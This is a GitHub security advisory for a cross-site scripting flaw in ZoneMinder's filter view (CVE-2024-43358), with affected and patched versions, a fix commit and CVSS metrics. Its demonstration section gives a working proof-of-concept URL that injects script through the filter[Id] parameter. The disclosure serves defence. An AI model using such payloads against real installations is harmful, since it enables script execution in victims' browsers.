Skip to content

XSS vulnerability in filter view

Low
connortechnology published GHSA-6rrw-66rf-6g5f Aug 12, 2024

Package

zoneminder

Affected versions

<= 1.36.33, <= 1.37.60

Patched versions

1.36.34, 1.37.61

Description

Impact

XSS All users affected

Demonstration
filter%5BId%5D
zm/?view=filter&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Battr%5D=Archived&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bop%5D=%3D&filter%5BQuery%5D%5Bterms%5D%5B0%5D%5Bval%5D=0&filter%5BQuery%5D%5Bterms%5D%5B1%5D%5Bcnj%5D=and&filter%5BQuery%5D%5Bterms%5D%5B1%5D%5Battr%5D=DiskPercent&filter%5BQuery%5D%5Bterms%5D%5B1%5D%5Bop%5D=%3E%3D&filter%5BQuery%5D%5Bterms%5D%5B1%5D%5Bval%5D=95&filter%5BQuery%5D%5Bterms%5D%5B2%5D%5Bcnj%5D=and&filter%5BQuery%5D%5Bterms%5D%5B2%5D%5Battr%5D=EndDateTime&filter%5BQuery%5D%5Bterms%5D%5B2%5D%5Bop%5D=IS+NOT&filter%5BQuery%5D%5Bterms%5D%5B2%5D%5Bval%5D=NULL&filter%5BQuery%5D%5Bsort_asc%5D=1&filter%5BQuery%5D%5Bsort_field%5D=Id&filter%5BQuery%5D%5Blimit%5D=100&filter%5BId%5D=496823%27%3balert(document.domain)%2f%2f)

Patches

062cf56

Workarounds

Manually apply 062cf56

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

CVE ID

CVE-2024-43358

Weaknesses

No CWEs